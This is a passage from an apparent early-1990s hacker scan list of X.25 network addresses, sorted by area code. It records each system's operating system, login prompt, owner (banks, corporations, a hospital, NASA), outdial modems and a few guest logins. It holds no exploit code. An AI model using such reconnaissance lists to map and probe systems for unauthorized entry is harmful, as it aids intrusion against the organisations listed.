  4403. 301 397    Prime       Primecom Network 19.4Q.111 System 97
  4404. 301 398    Prime       Primecom Network 19.4Q.111 System 98
  4405. 301 441  *
  4406. 301 442  *
  4407. 301 443  *
  4408. 301 444  *
  4409. 301 447  *
  4410. 301 448  *
  4411. 301 449  *
  4412. 301 450  *
  4413. 301 455    Unix SysV   oldabacis login: (uucp)
  4414. 301 521  $             NETX A000VD03 READY FOR LOGON
  4415. 301 530                PLEASE ENTER  LOGIN
  4416. 301 535A
  4417. 301 546  *
  4418. 301 548 
  4419. 301 558  *
  4420. 301 559  *
  4421. 301 560  *
  4422. 301 563  $ VM/CMS?     INVALID-SW-CHARS 
  4423. 301 565    Unix        E.T.Net/The National Library of Medicine. 
  4424. 301 1130 
  4425. 301 1131
  4426. 301 1134 *
  4427. 301 1136 *
  4428. 301 1139               8001A69E
  4429. 301 1142               9769AFC6
  4430. 301 1153 *
  4431. 301 1230               You are not authorized to connect to this machine.
  4432. 301 1241               Fannie Mae
  4433. 301 1243               USER ID 
  4434. 301 1244 *
  4435. 301 1245 *
  4436. 301 1253 *
  4437. 301 1551 *
  4438. 301 2040 *
  4439. 301 2042 *
  4440.  
  4441.  
  4442.  
  4443.  
  4444. 302  -  Delaware  Scanned: 0 - 300     
  4445.  
  4446. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4447. ---------- ----------- -------------------------------------------------
  4448. 302 41   $             (running same/similar software as tymnet)
  4449.  
  4450.  
  4451.  
  4452.  
  4453. 303  -  Colorado  Scanned: 0 - 1000     
  4454.  
  4455. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4456. ---------- ----------- -------------------------------------------------
  4457. 303 21   $             outdial (303)
  4458. 303 33                 Password > 
  4459. 303 47   *
  4460. 303 114  $             outdial (303)
  4461. 303 115  $             outdial (303)
  4462. 303 120    Prime       PRIMENET 22.1.3.R35 SAMSON
  4463. 303 140                X29 Password: 
  4464. 303 141  *
  4465. 303 142  *
  4466. 303 242  $ VAX/VMS     AZTEK Engineering MicroVAX (AZTKD1)
  4467. 303 268  *
  4468. 303 330  *
  4469. 303 333  *
  4470. 303 338  *
  4471. 303 561    Prime       PRIMENET 22.1.1.R11 SPARKY
  4472. 303 579    Prime       PRIMENET 22.1.3.R35 CAESAR
  4473. 303 800  *
  4474.  
  4475.  
  4476.  
  4477.  
  4478. 304  -  West Virginia  Scanned: [0 - 300]      
  4479.  
  4480. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4481. ---------- ----------- ------------------------------------------------- 
  4482. 304 101                ENTER: ASV2, ASV3 OR MPL780
  4483. 304 130                ENTER: ASV2, ASV3 OR MPL780
  4484.  
  4485.  
  4486.  
  4487.  
  4488. 305  -  Florida  Scanned: 0 - 2000
  4489.  
  4490. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4491. ---------- ----------- -------------------------------------------------
  4492. 305 4                  USER ID 
  4493. 305 34                 USER ID   
  4494. 305 59                 .INVALID COMMAND
  4495. 305 105  $             outdial (305)
  4496. 305 106  $             outdial (305)
  4497. 305 120  $             outdial (305)
  4498. 305 121  $             outdial (305)
  4499. 305 122  $             outdial (305)
  4500. 305 135  *
  4501. 305 140                .INVALID COMMAND
  4502. 305 141                Select Desired System:
  4503. 305 142                USER ID 
  4504. 305 145                USER ID
  4505. 305 149    hp-x000     S901.NET.BUC
  4506. 305 150  *
  4507. 305 156                USER ID
  4508. 305 162                WN01000000000000000000000000000
  4509. 305 170  *
  4510. 305 171    VM/CMS?     ENTER SWITCH CHARACTERS
  4511. 305 172                WN01000000000000000000000000000
  4512. 305 175                USER ID
  4513. 305 177                WN01000000000000000000000000000
  4514. 305 178    hp-x000     S901.NET.BUC
  4515. 305 237                Comcast Information Services
  4516. 305 241                WN01000000000000000000000000000
  4517. 305 245  *
  4518. 305 247
  4519. 305 250    Unix 
  4520. 305 339                CONNECTED TO PACKET/74
  4521. 305 347                CONNECTED TO PACKET/74
  4522. 305 362                CLARIONET  Userid :  new
  4523. 305 363                CLARIONET
  4524. 305 364                CLARIONET
  4525. 305 365                CLARIONET
  4526. 305 366                CLARIONET
  4527. 305 370  $
  4528. 305 371    VAX/VMS     Usuario :
  4529. 305 372  $ VAX/VMS     ORL001  
  4530. 305 471 
  4531. 305 472  $ HP-3000     MIA.MIA.EI 
  4532. 305 700 
  4533. 305 1036               CONNECTED TO PACKET/74
  4534. 305 1037               CONNECTED TO PACKET/74
  4535. 305 1043   Unix        
  4536. 305 1040               USER ID 
  4537. 305 1242   AOS         
  4538. 305 1243 *
  4539. 305 1244   Prime       PRIMENET 22.1.3 DZ-MIA
  4540.  
  4541.  
  4542.  
  4543.  
  4544. 309  -  Illinois  Scanned: [0 - 200]     
  4545.  
  4546. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4547. ---------- ----------- ------------------------------------------------- 
  4548. 309 30   *
  4549.  
  4550.  
  4551.  
  4552.  
  4553. 312  -  Illinois  Scanned: [0 - 1500]
  4554.  
  4555. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4556. ---------- ----------- ------------------------------------------------- 
  4557. 312 34                 YOUR ENTRY IS INCORRECT.
  4558. 312 35   $ TSO
  4559. 312 37   *
  4560. 312 40 
  4561. 312 41                 YOUR ENTRY IS INCORRECT.
  4562. 312 45                 YOUR ENTRY IS INCORRECT.
  4563. 312 53     TSO         COMMAND UNRECOGNIZED
  4564. 312 54     TSO
  4565. 312 59                 Id Please: 
  4566. 312 64   $             Purdue Annex  (*.cc.purdue.edu)
  4567. 312 65   $             MSG 1: COMMAND INVALID FROM PHTIB010
  4568. 312 74   *
  4569. 312 75   *
  4570. 312 77   $             USER ID
  4571. 312 78   $             USER ID
  4572. 312 121                enter system id -- 
  4573. 312 125  *
  4574. 312 131    VM/CMS      SYSTEMV 
  4575. 312 150                PLEASE ENTER SUBSCRIBERID;PASSWORD
  4576. 312 159                PLEASE ENTER SUBSCRIBERID;PASSWORD
  4577. 312 160                USERID: 
  4578. 312 170  $ VAX/VMS     This is SKMIC4 - Authorized use only
  4579. 312 233                USERID:
  4580. 312 235
  4581. 312 240  *
  4582. 312 245  *
  4583. 312 253  *
  4584. 312 254  *
  4585. 312 256                PLEASE LOGIN
  4586. 312 257  *
  4587. 312 258                ID:
  4588. 312 269                CUSTOMER ID: 
  4589. 312 270                CUSTOMER ID: 
  4590. 312 271                CUSTOMER ID: 
  4591. 312 350  *
  4592. 312 351    TSO           
  4593. 312 354  *
  4594. 312 378                BAXTER ASAP SYSTEM (LINE EG75)
  4595. 312 379    TSO
  4596. 312 398  $             MHP201A ITVI0180  * VERSION 6.0.2 *.
  4597. 312 400                BAXTER ASAP SYSTEM (LINE EGC7) 
  4598. 312 401                BAXTER ASAP SYSTEM (LINE EG4D)   
  4599. 312 402                BAXTER ASAP SYSTEM (LINE EGC5)
  4600. 312 403    TSO
  4601. 312 405    TSO
  4602. 312 410  $             outdial (312)
  4603. 312 411  $             outdial (312)
  4604. 312 451    TSO
  4605. 312 452                BAXTER ASAP SYSTEM (LINE EGED)
  4606. 312 475  *
  4607. 312 476  *
  4608. 312 477  $             USER ID
  4609. 312 520    Unix        R59X01 login: 
  4610. 312 521    Unix        R58X01 login: 
  4611. 312 522    Unix        R67X01 login:
  4612. 312 524    Unix        R51X01 login: 
  4613. 312 525    Unix        R41X01 login: 
  4614. 312 526                PASSWORD
  4615. 312 528                PASSWORD
  4616. 312 530  *
  4617. 312 531  *
  4618. 312 532  $ VAX/VMS
  4619. 312 533  *
  4620. 312 534  $             (echo)
  4621. 312 535  $             (echo)
  4622. 312 536  $             (echo)
  4623. 312 537  $             (echo)
  4624. 312 538  $             (echo)
  4625. 312 585  *
  4626. 312 587  *
  4627. 312 588  *
  4628. 312 589  *
  4629. 312 655    TSO
  4630. 312 740                TELENET ASYNC TO 3270 SERVICE 
  4631. 312 762  *
  4632. 312 763  *
  4633. 312 764  *
  4634. 312 765  *
  4635. 312 766  *
  4636. 312 767  *
  4637. 312 768  *
  4638. 312 769  *
  4639. 312 770  $             TELENET ASYNC TO 3270 SERVICE 
  4640. 312 772  $             TELENET ASYNC TO 3270 SERVICE AB-NET 
  4641. 312 1130   Unix        R52X01 login: 
  4642. 312 1131   Unix        R61X01 login: 
  4643. 312 1132   Unix        R63X01 login:
  4644. 312 1133   Unix        R40X01 login:
  4645. 312 1134   Unix        R43X01 login:
  4646. 312 1135   Unix        R46X01 login: 
  4647. 312 1139   Unix        R65X01 login: 
  4648. 312 1140   Unix        R54X01 login: 
  4649. 312 1141   Unix        R71X01 login: 
  4650. 312 1142   Unix        R56X01 login:
  4651. 312 1143   Unix        R55X01 login:
  4652. 312 1144   Unix        R48X01 login: 
  4653. 312 1150   Unix        R47X01 login:
  4654. 312 1151   Unix        R62X01 login: 
  4655. 312 1152   Unix        R45X01 login:
  4656. 312 1153   Unix        R42X01 login: 
  4657. 312 1154   Unix        R74X01 login: 
  4658. 312 1155   Unix        R60X01 login: 
  4659. 312 1177 *
  4660. 312 1179 *
  4661. 312 1232               REQUEST IN VIOLATION OF SYSTEM SECURITY STANDARDS 
  4662. 312 1233               REQUEST IN VIOLATION OF SYSTEM SECURITY STANDARDS     
  4663. 312 1250               YOUR ENTRY IS INCORRECT.
  4664. 312 1251               YOUR ENTRY IS INCORRECT.
  4665. 312 1258   Prime       PRIMENET 23.2.0.r26 HS6650
  4666. 312 1259               ENTER ID   (Westlaw)
  4667. 312 1270 *
  4668. 312 1271 *
  4669. 312 1272 *
  4670. 312 1275 *
  4671. 312 1301               MHP201A A00B1001  * VERSION 5.5.3 *.
  4672. 312 1302               MHP201A A00B1101  * VERSION 5.5.3 *.
  4673. 312 1303               MHP201A A00B1101  * VERSION 5.5.3 *.
  4674. 312 1304               MHP201A A00B1101  * VERSION 5.5.3 *.
  4675. 312 1305               MHP201A A00B1101  * VERSION 5.5.3 *. 
  4676. 312 1306               MHP201A A00B1101  * VERSION 5.5.3 *. 
  4677. 312 1307               MHP201A A00B1101  * VERSION 5.5.3 *.
  4678. 312 1308               MHP201A A00B1101  * VERSION 5.5.3 *. 
  4679. 312 1309               MHP201A A00B1101  * VERSION 5.5.3 *.
  4680. 312 1310               MHP201A A00B1101  * VERSION 5.5.3 *.  
  4681. 312 1311               MHP201A A00B1101  * VERSION 5.5.3 *. 
  4682. 312 1340 *
  4683. 312 1341               ENTER ID   (Westlaw)
  4684. 312 1534 *
  4685. 312 1535 *
  4686.  
  4687.  
  4688.  
  4689.  
  4690. 313  -  Michigan  Scanned: [0 - 2000]      
  4691.  
  4692. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4693. ---------- ----------- ------------------------------------------------- 
  4694. 313 24   $             outdial (313)
  4695. 313 40                 Autonet Line 3130095084  
  4696. 313 41                 Autonet Line 3130095084
  4697. 313 62                 Merit:X.25 Gateway
  4698. 313 75   *
  4699. 313 82                 Enter "CMS userid", "TSO userid ", "SIMVTAM termid"
  4700. 312 219                enter system id -- 
  4701. 313 101  $             outdial (313)
  4702. 313 111  $             outdial (313)
  4703. 313 140  $             USER ID
  4704. 313 144  $ DTC         DTCHQ02.WD.WD            
  4705. 313 145                Please enter your Access Code ? 
  4706. 313 146                Please enter your Access Code ?
  4707. 313 148                PLEASE ENTER SUBSCRIBERID;PASSWORD
  4708. 313 152    Unix/SunOS  SPRINT.COM SunLink X.29 service
  4709. 313 153                MHP1201I TERMINAL CONNECTED TO PACKET/74
  4710. 313 160                PASSWORD (this will hang you up)
  4711. 313 164                VU/TEXT
  4712. 313 165  *
  4713. 313 171                U#=
  4714. 313 173    VAX/VMS     IPP VAX/VMS V5.4-3 SYSTEM VIP012
  4715. 313 202                Merit:X.25 Gateway
  4716. 313 214  $             outdial (313)
  4717. 313 216  $             outdial (313)
  4718. 313 239    Unix        Valenite
  4719. 313 250    HP-3000
  4720. 313 330  $ Unix        Domino's Pizza Distribution Corp 
  4721. 313 350  *
  4722. 313 351  *
  4723. 313 352  *
  4724. 313 353  *
  4725. 313 354  *
  4726. 313 355  *
  4727. 313 365    Unix/SunOS  This is our latest and greatest X.29 service
  4728. 313 705    OS4000 5.5  Logging in  user
  4729. 313 800    Prime       PRIMENET 22.1.4.R39v D1D2  
  4730. 313 1020               USER ID   
  4731. 313 1021               USER ID   
  4732. 313 1032 *
  4733. 313 1162   Unix        R44X01 login:
  4734. 313 1163   Unix        R69X01 login: 
  4735. 313 1164   Unix        R50X01 login: 
  4736. 313 1165   Unix        R57X01 login:
  4737. 313 1166   Unix        R64X01 login:
  4738. 313 1167   Unix        R66X01 login:
  4739. 313 1169   Unix        R70X01 login:
  4740. 313 1170   Unix        R73X01 login:
  4741. 313 1171   Unix        R75X01 login:
  4742. 313 1172   Unix        R72X01 login: 
  4743. 313 1174   Unix        R77X01 login: 
  4744. 313 1175   Unix/SysV   (jupiter)
  4745. 313 1176   Unix        aries login: 
  4746. 313 1177   Unix        hermes login: 
  4747.  
  4748.  
  4749.  
  4750.  
  4751. 314  -  Missouri  Scanned: [0 - 300]      
  4752.  
  4753. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4754. ---------- ----------- ------------------------------------------------- 
  4755. 314 139  *
  4756. 314 143  $ ???         Please log in (or type "/DOC/DEMO").
  4757. 314 260 
  4758.  
  4759.  
  4760.  
  4761.  
  4762. 315  -  New York  Scanned: [0 - 300]      
  4763.  
  4764. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4765. ---------- ----------- ------------------------------------------------- 
  4766. 315 20                 (echo)
  4767. 315 32   $             COMMAND UNRECOGNIZED
  4768. 315 50   $ SIM3278
  4769. 315 135                (echo)
  4770. 315 136                (echo)
  4771. 315 137  $             GTE CAMILLUS NY
  4772. 315 138                CONNECTED TO PACKET/94
  4773. 315 145    VAX/VMS     Username:
  4774. 315 149  $             GTE CAMILLUS NY 
  4775. 315 150                GTE CAMILLUS NY 
  4776. 315 151                GTE CAMILLUS NY 
  4777. 315 152                (echo)
  4778. 315 162                CONNECTED TO PACKET/400
  4779. 315 172  *
  4780. 315 231 
  4781.  
  4782.  
  4783.  
  4784.  
  4785. 317  -  Indiana  Scanned: [0 - 300]      
  4786.  
  4787. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4788. ---------- ----------- ------------------------------------------------- 
  4789. 317 55   $             outdial (317)
  4790. 317 113  $             outdial (317)
  4791. 317 114  $             outdial (317)
  4792. 317 127    VTAM/M02
  4793. 317 134  $ Prime       PRIMENET 22.0.4.R8 PENTEK
  4794. 317 136  *
  4795. 317 140    VAX/VMS
  4796. 317 142  *
  4797. 317 143  $             (hangs up)
  4798. 317 145    Prime       PRIMENET 22.1.3 ARVN01
  4799. 317 148                USER ID
  4800. 317 154    VAX/VMS
  4801. 317 157  *
  4802. 317 159  *
  4803. 317 164  $             (hangs up)
  4804. 317 174                
  4805. 317 235  $             CONNECTED TO PACKET/74 
  4806. 317 251                CONNECTED TO PACKET/400
  4807. 317 253  *
  4808. 317 255 
  4809. 317 260    Unix        SIL_CHI
  4810. 317 299                ASYNC to whatever -- (try logical unit=9)
  4811. 317 335    VAX/VMS
  4812. 317 336  *
  4813.  
  4814.  
  4815.  
  4816.  
  4817. 321  -  SPAN/NASA  Scanned: [N/A]
  4818.  
  4819. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4820. ---------- ----------- ------------------------------------------------- 
  4821. 321        Note: Access to SPAN now passes through a network
  4822.                  validation gateway. I was unable to get passed
  4823.                  this, and unable to scan this prefix. 
  4824.                  Here is the friendly message you get on attempts:
  4825.  
  4826.                  Entering the NASA Packet Switching System (NPSS)
  4827.                  Please Report Service Access Problems To (205) 544-1771
  4828.  
  4829.                  <insert large warning banner>
  4830.  
  4831.                  USERID>   
  4832.                  PASSWORD> 
  4833.                  SERVICE>  
  4834.  
  4835.  
  4836.  
  4837.  
  4838. 401  -  Rhode Island  Scanned: [0 - 300]     
  4839.  
  4840. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4841. ---------- ----------- ------------------------------------------------- 
  4842. 401 50   *
  4843. 401 230  *
  4844.  
  4845.  
  4846.  
  4847.  
  4848. 402  -  Nebraska  Scanned: [0 - 300]      
  4849.  
  4850. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4851. ---------- ----------- ------------------------------------------------- 
  4852. 402 47 
  4853. 402 57     Unix        NCR 386/486  System name: tower12
  4854. 402 131  *
  4855. 402 231  *
  4856.  
  4857.  
  4858.  
  4859.  
  4860. 404  -  Georgia  Scanned: [0-700]      
  4861.  
  4862. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4863. ---------- ----------- ------------------------------------------------- 
  4864. 404 55   *
  4865. 404 57
  4866. 404 59 
  4867. 404 70
  4868. 404 77 
  4869. 404 79 
  4870. 404 143 
  4871. 404 171
  4872. 404 235.1  Port Selec  The Journal Of Commerce
  4873. 404 235.2  VAX/VMS     Nedlloyd Lines Region Management North America
  4874. 404 244
  4875. 404 247 
  4876. 404 250.1              CUSTOMER ID:
  4877. 404 250.2              (garbage)
  4878. 404 251.1              CUSTOMER ID:
  4879. 404 252.1              CUSTOMER ID: 
  4880. 404 262.2              TACL 1> 
  4881. 404 263.2              TACL 1> 
  4882. 404 264.2              TACL 1> 
  4883. 404 265.2              TACL 1> 
  4884. 404 266.2              TACL 1> 
  4885. 404 349    Prime       PRIMENET 22.1.3 EHPATL
  4886. 404 358
  4887. 404 359
  4888. 404 372    VOS
  4889. 404 373    VOS
  4890. 404 374  * 
  4891. 404 560    VAX/VMS
  4892. 404 633    VAX/VMS
  4893. 404 635    VAX/VMS
  4894.  
  4895.  
  4896.  
  4897.  
  4898. 405  -  Oklahoma  Scanned: [0 - 300]     
  4899.  
  4900. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4901. ---------- ----------- ------------------------------------------------- 
  4902. 405 45                 ENTER SESSION ESTABLISHMENT REQUEST : 
  4903. 405 46                 TACL 1>
  4904. 405 130  *
  4905. 405 242    VAX/VMS
  4906. 405 245  *
  4907. 405 246
  4908. 405 248  *
  4909. 405 249  *
  4910.  
  4911.  
  4912.  
  4913.  
  4914. 408  -  California  Scanned: [0 - 1500]      
  4915.  
  4916. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4917. ---------- ----------- ------------------------------------------------- 
  4918. 408 21   $             outdial (408)
  4919. 408 31   *
  4920. 408 45   $ HP-3000     SPECTRA-PHYSICS  LASERS  
  4921. 408 49   *
  4922. 408 61 
  4923. 408 77   $             USER ID
  4924. 408 110  $             outdial (408)
  4925. 408 111  $             outdial (408)
  4926. 408 121    HP-3000     SAGAN.HP.COM
  4927. 408 127    Unix
  4928. 408 133  $             (echo)
  4929. 408 159  $ VAX/VMS
  4930. 408 177  *
  4931. 408 235    AOS         GLOBAL WEATHER MV3
  4932. 408 238    Unix        
  4933. 408 260  *
  4934. 408 261  *
  4935. 408 264                Portal Communications Company. NEW/INFO/HELP
  4936. 408 267  *
  4937. 408 268  *
  4938. 408 271 
  4939. 408 273 
  4940. 408 335    VAX/VMS     CONNECTING TO NODE: LTCTST
  4941. 408 342  $ Unix/SunOS  (OSI)
  4942. 408 343  $ VTAM        Amdahl Corporate Computer Network
  4943. 408 344  $ VAX/VMS     ANDO running VMS V5.4-2
  4944. 408 346    Unix        IGC Networks   login:new  password:<cr>
  4945. 408 352  $ VTAM        Amdahl Corporate Computer Network  
  4946. 408 356  *
  4947. 408 357  *
  4948. 408 378    Unix        X.25 PAD  (pad echo)
  4949. 408 450    Unix        HP-UX moe 
  4950. 408 444  $ HP-3000     Finnigan Corporation  
  4951. 408 445  $ VAX/VMS     GEC PLESSEY Semiconductors 
  4952. 408 449    VAX/VMS     Friden Neopost (Node: PRDSYS)
  4953. 408 450    Unix        HP-UX moe 
  4954. 408 456  *
  4955. 408 530  *
  4956. 408 531  *
  4957. 408 532  *
  4958. 408 534  $ DTC         DTC02.DOMAIN.ORGANIZATION
  4959. 408 539                User Access Verification Password: 
  4960. 408 1050 
  4961. 408 1046 *
  4962. 408 1050 
  4963. 408 1051 
  4964. 408 1052 
  4965. 408 1053 
  4966. 408 1054   Port Selec  First Image
  4967. 408 1055 
  4968. 408 1060 $             REQUESTED APPLICATION NOT DEFINED
  4969. 408 1061 $             REQUESTED APPLICATION NOT DEFINED 
  4970. 408 1062 $             REQUESTED APPLICATION NOT DEFINED 
  4971. 408 1063 $             REQUESTED APPLICATION NOT DEFINED
  4972. 408 1064 $             REQUESTED APPLICATION NOT DEFINED 
  4973. 408 1065 $             REQUESTED APPLICATION NOT DEFINED
  4974. 408 1066 $             REQUESTED APPLICATION NOT DEFINED 
  4975. 408 1067 $             REQUESTED APPLICATION NOT DEFINED
  4976. 408 1068 $             REQUESTED APPLICATION NOT DEFINED
  4977. 408 1069 $             REQUESTED APPLICATION NOT DEFINED 
  4978. 408 1071 $             (echo)
  4979. 408 1072 $             (echo)
  4980. 408 1076 $             (echo)
  4981. 408 1230 $             (echo)
  4982. 408 1231 $             (echo)
  4983. 408 1234 $             (echo)
  4984. 408 1235 $             (echo)
  4985. 408 1238 *
  4986. 408 1240 $             (hangs up)
  4987. 408 1350   VAX/VMS
  4988.  
  4989.  
  4990.  
  4991.  
  4992. 410  - RCA? MCI?  Scanned: [0-300+]
  4993.  
  4994. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  4995. ---------- ----------- ------------------------------------------------- 
  4996. 410 0                  MCI  YR ID?
  4997.  
  4998.  
  4999.  
  5000.  
  5001. 412  -  Pennsylvania  Scanned: [0 - 1000]
  5002.  
  5003. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5004. ---------- ----------- ------------------------------------------------- 
  5005. 412 30                 USER ID   
  5006. 412 33     VAX/VMS     Lender's Service, Inc. Computer System
  5007. 412 34   $ ACF/VTAM    Lord Corp IBM Network
  5008. 412 51                 *** ENTER LOGON
  5009. 412 52                 *** ENTER LOGON
  5010. 412 55                 COMMAND UNRECOGNIZED
  5011. 412 60                 PC2LAN Connected to Router Pit
  5012. 412 61                 %@CVTTAUD@dUYECVGUIiED
  5013. 412 63                 %@CVTTAUD@dUYECVGUIiED
  5014. 412 67     SIM3278     Mellon Bank
  5015. 412 70   *
  5016. 412 78                 # 
  5017. 412 79                 # 
  5018. 412 130 
  5019. 412 153                *** ENTER LOGON
  5020. 412 201  $             outdial (412)
  5021. 412 202  $             outdial (412)
  5022. 412 230    VAX/VMS     You are connected to a private system.
  5023. 412 231  $ Prime       PRIMENET 22.1.3.r13 MECO
  5024. 412 335  *
  5025. 412 336                Renex Connect, SN-00300371
  5026. 412 340    SIM3278     Mellon Bank
  5027. 412 342                COMMAND UNRECOGNIZED FOR T11310T0
  5028. 412 349                *** ENTER LOGON
  5029. 412 352                *** ENTER LOGON
  5030. 412 440    Unix/SysV   X.29 Terminal Service (dxi-m1)          
  5031. 412 708    Unix/SysV   X.29 Terminal Service (dxi-m1)
  5032.  
  5033.  
  5034.  
  5035.  
  5036. 414  -  Wisconsin  Scanned: [0 - 300]
  5037.  
  5038. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5039. ---------- ----------- ------------------------------------------------- 
  5040. 414 20   $             outdial (414)
  5041. 414 21   $             outdial (414)
  5042. 414 36   *
  5043. 414 46   $ Prime       PRIMENET 22.1.4-SC1 SYSU
  5044. 414 49                 CONNECTED TO MMISC 
  5045. 414 60                 User Name?   (MGIC)
  5046. 414 120  $             outdial (414)
  5047. 414 165                USER ID   
  5048. 414 170  *
  5049. 414 241  *
  5050. 414 242  *
  5051.  
  5052.  
  5053.  
  5054.  
  5055. 415  -  California  Scanned: [0 - 1500]
  5056.  
  5057. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5058. ---------- ----------- -------------------------------------------------
  5059. 415 5    $             outdial (415)
  5060. 415 7      HP-3000     EXPECTED HELLO, :JOB, :DATA, OR (CMD) AS LOGON.
  5061. 415 11   $             outdial (415)
  5062. 415 20                 Dialog Information Services
  5063. 415 23   $             outdial (415)
  5064. 415 27                 Stanford Data Center (SYSA), Forsythe Hall.
  5065. 415 29A                Stanford University Hospital System (SUH/SYSC).
  5066. 415 31                 You are not authorized to connect to this system
  5067. 415 35                 (echo)
  5068. 415 38                 DTC04.LSI.NET 
  5069. 415 48                 Dialog Information Services
  5070. 415 49                 Dialog Information Services
  5071. 415 53B    VAX/VMS     Username:
  5072. 415 54                 USER ID 
  5073. 415 56                 CONNECTED TO PACKET/74
  5074. 415 68A    VAX/VMS     Username:
  5075. 415 74   *
  5076. 415 108  $             outdial (415)
  5077. 415 109  $             outdial (415)
  5078. 415 131  $ HP-3000
  5079. 415 153                CONNECTED TO PACKET/94
  5080. 415 165  *
  5081. 415 167    Prime       PRIMENET 22.1.3 VESTEK
  5082. 415 168    Unix        Vestek
  5083. 415 174  *
  5084. 415 175                Dialog Information Services
  5085. 415 215  $             outdial (415)
  5086. 415 216  $             outdial (415)
  5087. 415 217  $             outdial (415)
  5088. 415 224  $             outdial (414)
  5089. 415 232    Unix        pandora
  5090. 415 234  $ Unix        UNIX System V Release 1.0-92b011 AT&T MIServer-S
  5091. 415 475    Prime       PRIMENET 22.1.3.R21 CORP.1
  5092. 415 476  *
  5093. 415 569    DACS        
  5094. 415 1030   Prime
  5095. 415 1052 *
  5096. 415 1053   HP-3000
  5097. 415 1057 $ VAX/VMS     
  5098. 415 1069 *
  5099. 415 1252 *
  5100. 415 1255 $ DTC         ERROR: User not authorized
  5101. 415 1262 $ ???         ???
  5102. 415 1268               TACL 1> 
  5103. 415 1269               TACL 1> 
  5104. 415 1356 *
  5105. 415 1357 *
  5106. 415 1600               USER ID   
  5107.  
  5108.  
  5109.  
  5110.  
  5111. 422  -  Westinghouse  Scanned: various      
  5112.  
  5113. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  5114. ---------- ----------- ------------------------------------------------- 
  5115. 422 101.1              ENTER PASSWORD
  5116. 422 104    DTC         Type 'H' or '?' for HELP
  5117. 422 105                CONNECTED TO PACKET/74
  5118. 422 106    GS/1        FASD >
  5119. 422 115                Westinghouse X.25 Network  WCIS Gandalf pad 422115
  5120. 422 122 
  5121. 422 123    VM/XA       Westinghouse Corporate Computer Services
  5122. 422 129                COMMTEX Cx-80 DATA EXCHANGE 
  5123. 422 131.1  annex       tcc_inn>   
  5124. 422 131.2              >
  5125. 422 131.3
  5126. 422 131.4              Network Access DSU/CSU  (menu driven need vt100)
  5127. 422 131.5              uGn
  5128. 422 131.6
  5129. 422 131.7              MJgsonnesvev>3=9>722>?=3=>7/3=9>7?=????7
  5130. 422 135.5
  5131. 422 135.6  annex       tcc_hub>
  5132. 422 135.7              ** USER NOT LOGGED ON
  5133. 422 135.10             ** USER NOT LOGGED ON
  5134. 422 135.20 annex       tcc_hub>
  5135. 422 135.30 
  5136. 422 137.1  annex       credit>
  5137. 422 137.4
  5138. 422 137.5  ???         <         (try '?')
  5139. 422 137.9  annex       credit1>  
  5140. 422 138                Select Destination:    
  5141. 422 139    VM/XA       Westinghouse Corporate Computer Services 
  5142. 422 150 
  5143. 422 154 
  5144. 422 165
  5145. 422 166 
  5146. 422 167 
  5147. 422 168
  5148. 422 169 
  5149. 422 180                WESTINGHOUSE SNA NETWORK - ENTER: L APPLNAME
  5150. 422 181                WESTINGHOUSE SNA NETWORK - ENTER: L APPLNAME
  5151. 422 183                MHP1201I TERMINAL CONNECTED TO PACKET/74
  5152. 422 184                MHP1201I TERMINAL CONNECTED TO PACKET/74
  5153. 422 185                MHP1201I TERMINAL CONNECTED TO PACKET/74
  5154. 422 187                MHP1201I TERMINAL CONNECTED TO PACKET/74
  5155. 422 237 
  5156. 422 240 
  5157. 422 244                WESPAC/ENTER PASSWORD
  5158. 422 252 
  5159. 422 254.6              Westinghouse X.25 Network /  Tech Control  422254
  5160. 422 254.8              (drops to dos?)
  5161. 422 255    VM/???      WESCO INFORMATION SYSTEMS
  5162. 422 310    VAX/VMS     
  5163. 422 311
  5164. 422 340 
  5165. 422 346 
  5166. 422 365 
  5167. 422 375 
  5168. 422 376    AOS         Westinghouse Corporate Information Services  
  5169. 422 381                TACL 1> 
  5170. 422 390
  5171. 422 401    AOS 
  5172. 422 405    AOS 
  5173. 422 409    AOS 
  5174. 422 410    AOS 
  5175. 422 412    AOS 
  5176. 422 413    AOS 
  5177. 422 416    AOS 
  5178. 422 424    AOS 
  5179. 422 431    AOS 
  5180. 422 440    AOS 
  5181. 422 443    AOS 
  5182. 422 450.2              RM > 
  5183. 422 450.3              CDS > 
  5184. 422 450.4              CDS > 
  5185. 422 450.5              (beep!)
  5186. 422 450.6              CDS > 
  5187. 422 450.7              CDS > 
  5188. 422 450.8              RM > 
  5189. 422 450.9              CDS > 
  5190. 422 450.10             CDS > 
  5191. 422 450.11             CDS > 
  5192. 422 454 
  5193. 422 493    AOS 
  5194. 422 494                Westinghouse ESCC    IBM C-80 System B Access
  5195. 422 495                Westinghouse ESCC    IBM C-80 System B Access
